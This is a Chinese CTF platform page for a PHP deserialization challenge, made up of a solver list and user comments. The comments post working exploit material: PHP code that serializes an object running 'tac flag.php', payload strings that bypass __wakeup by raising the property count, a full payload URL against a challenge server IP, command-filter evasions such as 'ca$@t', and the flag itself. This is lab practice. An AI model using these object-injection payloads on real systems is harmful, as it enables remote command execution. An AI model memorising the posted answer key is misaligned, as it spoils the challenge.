评分(3)
解题动态

yht111 攻破了该题 1天前

a5580990 攻破了该题 3天前

2410968090 攻破了该题 6天前

蟹堡王第一厨师长 攻破了该题 9天前

llc123 攻破了该题 11天前

294903544 攻破了该题 12天前

19933663636 攻破了该题 16天前

GS 攻破了该题 17天前

Ftcioer 攻破了该题 17天前

不上早八 攻破了该题 20天前

Sadoshi 攻破了该题 21天前

pezn1and 攻破了该题 22天前

jiayouya 攻破了该题 23天前

YEaling 攻破了该题 25天前

18897888104 攻破了该题 27天前

clannad 攻破了该题 28天前

mxdyld 攻破了该题 1月前

ct1640 攻破了该题 1月前

18079625201 攻破了该题 1月前

评论
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 1年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 1年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 1年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 2年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 2年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~